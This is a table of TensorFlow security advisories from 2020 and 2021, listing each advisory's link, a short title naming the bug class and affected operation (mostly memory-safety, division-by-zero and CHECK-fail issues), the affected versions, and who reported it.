| [TFSA-2021-126](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-126.md) | Use after free in boosted trees creation | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-125](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-125.md) | Heap buffer overflow in `FractionalAvgPoolGrad` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-124](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-124.md) | Segfault and heap buffer overflow in `{Experimental,}DatasetToTFRecord` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-123](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-123.md) | Null pointer dereference in `UncompressElement` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-122](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-122.md) | Incorrect validation of `SaveV2` inputs | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-121](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-121.md) | Null pointer dereference in `SparseTensorSliceDataset` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-120](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-120.md) | Bad alloc in `StringNGrams` caused by integer conversion | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-119](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-119.md) | Integer overflow due to conversion to unsigned | >=2.4.0, < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-118](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-118.md) | Null pointer dereference in `MatrixDiagPartOp` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-117](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-117.md) | `std::abort` raised from `TensorListReserve` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-116](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-116.md) | Heap OOB in `RaggedGather` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-115](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-115.md) | Division by 0 in `ResourceScatterDiv` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-114](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-114.md) | Integer division by 0 in sparse reshaping | >=2.5.0, < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-113](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-113.md) | Null pointer dereference and heap OOB read in operations restoring tensors | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-112](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-112.md) | Null pointer dereference in `RaggedTensorToTensor` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-111](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-111.md) | Null pointer dereference in `CompressElement` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-110](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-110.md) | Floating point exception in `SparseDenseCwiseDiv` | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-109](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-109.md) | Heap out of bounds access in sparse reduction operations | < 2.6.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-108](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-108.md) | Segfault in `tf.raw_ops.ImmutableConst` | < 2.5.0 | (discovered internally) |
| [TFSA-2021-107](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-107.md) | Segfault in `tf.raw_ops.SparseCountSparseOutput` | < 2.5.0 | (discovered internally) |
| [TFSA-2021-106](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-106.md) | Crash in `tf.strings.substr` due to `CHECK`-fail | < 2.5.0 | (Reported on GitHub) | [issue report](https://github.com/tensorflow/tensorflow/issues/46900)
| [TFSA-2021-105](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-105.md) | Crash in `tf.transpose` with complex inputs | < 2.5.0 | (Reported on GitHub) | [issue report](https://github.com/tensorflow/tensorflow/issues/46891)
| [TFSA-2021-104](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-104.md) | Null dereference in Grappler's `TrySimplify` | < 2.5.0 | (discovered internally) |
| [TFSA-2021-103](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-103.md) | Stack overflow in `ParseAttrValue` with nested tensors | < 2.5.0 | (discovered internally) |
| [TFSA-2021-102](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-102.md) | Interpreter crash from `tf.io.decode_raw` | < 2.5.0 | (discovered internally) |
| [TFSA-2021-101](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-101.md) | Incomplete validation in `tf.raw_ops.CTCLoss` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-100](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-100.md) | Heap buffer overflow in `BandedTriangularSolve` | < 2.5.0 | Ye Zhang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-099](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-099.md) | Invalid validation in `QuantizeAndDequantizeV2` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-098](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-098.md) | Incomplete validation in `SparseReshape` | >=2.3.0, < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-097](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-097.md) | Incomplete validation in `SparseSparseMinimum` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-096](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-096.md) | Incomplete validation in `SparseAdd` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-095](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-095.md) | Heap OOB and null pointer dereference in `RaggedTensorToTensor` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-094](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-094.md) | Heap OOB read in TFLite | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-093](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-093.md) | Heap OOB write in TFLite | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-092](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-092.md) | Integer overflow in TFLite memory allocation | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-091](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-091.md) | Integer overflow in TFLite concatenation | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-090](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-090.md) | Division by zero in TFLite's implementation of hashtable lookup | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-089](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-089.md) | Division by zero in TFLite's implementation of `DepthwiseConv` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-088](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-088.md) | Division by zero in TFLite's implementation of `OneHot` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-087](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-087.md) | Division by zero in TFLite's implementation of `Split` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-086](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-086.md) | Division by zero in TFLite's implementation of `SVDF` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-085](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-085.md) | Division by zero in TFLite's implementation of `SpaceToBatchNd` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-084](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-084.md) | Division by zero in TFLite's implementation of `BatchToSpaceNd` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-083](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-083.md) | Division by zero in TFLite's implementation of `EmbeddingLookup` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-082](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-082.md) | Division by zero in TFLite's convolution code | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-081](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-081.md) | Division by zero in TFLite's implementation of `DepthToSpace` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-080](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-080.md) | Stack overflow due to looping TFLite subgraph | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-079](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-079.md) | Null pointer dereference in TFLite's `Reshape` operator | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-078](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-078.md) | Heap OOB read in TFLite's implementation of `Minimum` or `Maximum` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-077](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-077.md) | Division by zero in TFLite's implementation of `TransposeConv` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-076](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-076.md) | Division by zero in TFLite's implementation of `GatherNd` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-075](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-075.md) | Division by zero in TFLite's implementation of `SpaceToDepth` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-074](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-074.md) | Division by zero in optimized pooling implementations in TFLite | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-073](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-073.md) | Division by zero in padding computation in TFLite | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-072](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-072.md) | Heap buffer overflow and undefined behavior in `FusedBatchNorm` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-071](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-071.md) | `CHECK`-fail due to integer overflow | < 2.5.0 | University of Virginia and University of California, Santa Barbara |
| [TFSA-2021-070](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-070.md) | Heap OOB read in `tf.raw_ops.Dequantize` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-069](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-069.md) | Segfault in `CTCBeamSearchDecoder` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-068](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-068.md) | Heap buffer overflow in `MaxPoolGrad` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-067](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-067.md) | Heap buffer overflow in `FractionalAvgPoolGrad` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-066](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-066.md) | Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-065](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-065.md) | Heap buffer overflow in `AvgPool3DGrad` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-064](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-064.md) | Heap buffer overflow in `MaxPool3DGradGrad` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-063](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-063.md) | Undefined behavior in `MaxPool3DGradGrad` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-062](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-062.md) | Division by 0 in `MaxPoolGradWithArgmax` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-061](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-061.md) | Overflow/denial of service in `tf.raw_ops.ReverseSequence` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-060](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-060.md) | Reference binding to nullptr in `SdcaOptimizer` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-059](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-059.md) | Memory corruption in `DrawBoundingBoxesV2` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-058](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-058.md) | Heap out of bounds read in `RequantizationRange` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-057](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-057.md) | Heap out of bounds read in `MaxPoolGradWithArgmax` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-056](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-056.md) | Lack of validation in `SparseDenseCwiseMul` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-055](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-055.md) | Reference binding to null in `ParameterizedTruncatedNormal` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-054](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-054.md) | Heap OOB access in `Dilation2DBackpropInput` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-053](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-053.md) | Null pointer dereference in `SparseFillEmptyRows` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-052](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-052.md) | Null pointer dereference in `EditDistance` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-051](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-051.md) | `CHECK`-fail in `tf.raw_ops.RFFT` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-050](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-050.md) | `CHECK`-fail in `tf.raw_ops.IRFFT` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-049](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-049.md) | `CHECK`-fail in `LoadAndRemapMatrix` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-048](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-048.md) | Heap buffer overflow in `RaggedTensorToTensor` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-047](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-047.md) | Heap OOB access in unicode ops | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-046](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-046.md) | Heap buffer overflow in `SparseSplit` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-045](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-045.md) | Division by 0 in `Reverse` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-044](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-044.md) | Division by 0 in `SparseMatMul` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-043](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-043.md) | Division by 0 in `FusedBatchNorm` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-042](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-042.md) | Division by 0 in `DenseCountSparseOutput` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-041](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-041.md) | `CHECK`-failure in `UnsortedSegmentJoin` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-040](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-040.md) | Heap OOB in `QuantizeAndDequantizeV3` | < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-039](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-039.md) | OOB read in `MatrixTriangularSolve` | < 2.5.0 | Ye Zhang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-038](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-038.md) | Division by 0 in `FractionalAvgPool` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-037](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-037.md) | Division by 0 in `QuantizedAdd` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-036](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-036.md) | Division by 0 in `QuantizedBatchNormWithGlobalNormalization` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-035](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-035.md) | Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-034](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-034.md) | Division by 0 in `QuantizedBiasAdd` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-033](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-033.md) | Heap buffer overflow in `SparseTensorToCSRSparseMatrix` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-032](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-032.md) | `CHECK`-fail in `CTCGreedyDecoder` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-031](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-031.md) | `CHECK`-fail in `QuantizeAndDequantizeV4Grad` | >= 2.4.0, < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-030](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-030.md) | Null pointer dereference in `StringNGrams` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-029](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-029.md) | Heap buffer overflow `StringNGrams` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-028](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-028.md) | Heap buffer overflow `Conv2DBackpropFilter` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-027](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-027.md) | Division by zero in `Conv2DBackpropFilter` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-026](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-026.md) | Heap buffer overflow in `QuantizedReshape` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-025](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-025.md) | Heap buffer overflow in `QuantizedResizeBilinear` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-024](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-024.md) | `CHECK`-fail in `SparseConcat` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-023](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-023.md) | Heap buffer overflow in `QuantizedMul` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-022](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-022.md) | `CHECK`-fail in `DrawBoundingBoxes` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-021](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-021.md) | Heap out of bounds read in `RaggedCross` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-020](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-020.md) | `CHECK`-fail in `tf.raw_ops.EncodePng` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-019](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-019.md) | Heap buffer overflow caused by rounding | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-018](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-018.md) | Invalid validation in `SparseMatrixSparseCholesky` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-017](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-017.md) | Division by 0 in `QuantizedMul` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-016](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-016.md) | Division by 0 in `QuantizedConv2D` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-015](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-015.md) | Division by 0 in `Conv2D` | < 2.5.0 | Ying Wang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-014](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-014.md) | Division by 0 in `Conv2DBackpropInput` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-013](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-013.md) | Division by 0 in `Conv2DBackpropFilter` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-012](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-012.md) | `CHECK`-fail in `AddManySparseToTensorsMap` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-011](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-011.md) | Division by 0 in `Conv3DBackprop*` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-010](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-010.md) | Heap buffer overflow in `Conv3DBackprop*` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-009](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-009.md) | Segfault in `SparseCountSparseOutput` | >= 2.3.0, < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-008](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-008.md) | `CHECK`-fail in `SparseCross` due to type confusion | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-007](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-007.md) | Session operations in eager mode lead to null pointer dereferences | >= 2.0.0, < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-006](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-006.md) | Division by zero in `Conv3D` | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-005](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-005.md) | Null pointer dereference via invalid Ragged Tensors | < 2.5.0 | Yakun Zhang and Ying Wang of Baidu X-Team |
| [TFSA-2021-004](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-004.md) | Reference binding to null pointer in `MatrixDiag*` ops | < 2.5.0 | Ye Zhang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-003](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-003.md) | Type confusion during tensor casts lead to dereferencing null pointers | < 2.5.0 | Aivul Team from Qihoo 360; Ye Zhang and Yakun Zhang of Baidu X-Team |
| [TFSA-2021-002](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-002.md) | Heap out of bounds write in `RaggedBinCount` | >= 2.3.0, < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2021-001](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2021-001.md) | Heap buffer overflow in `RaggedBinCount` | >= 2.3.0, < 2.5.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-034](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-034.md) | Heap out of bounds access in MakeEdge | >= 1.15.0, <= 2.3.0 | (discovered internally) |
| [TFSA-2020-033](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-033.md) | CHECK-fail in LSTM with zero-length input | >= 1.15.0, <= 2.3.0 | (discovered internally) |
| [TFSA-2020-032](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-032.md) | Heap out of bounds read in filesystem glob matching | 2.4.0-rc{0,1,2,3} | Aivul Team from Qihoo 360 |
| [TFSA-2020-031](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-031.md) | Write to immutable memory region | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
| [TFSA-2020-030](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2020-030.md) | Lack of validation in data format attributes | >= 1.15.0, <= 2.3.0 | Aivul Team from Qihoo 360 |
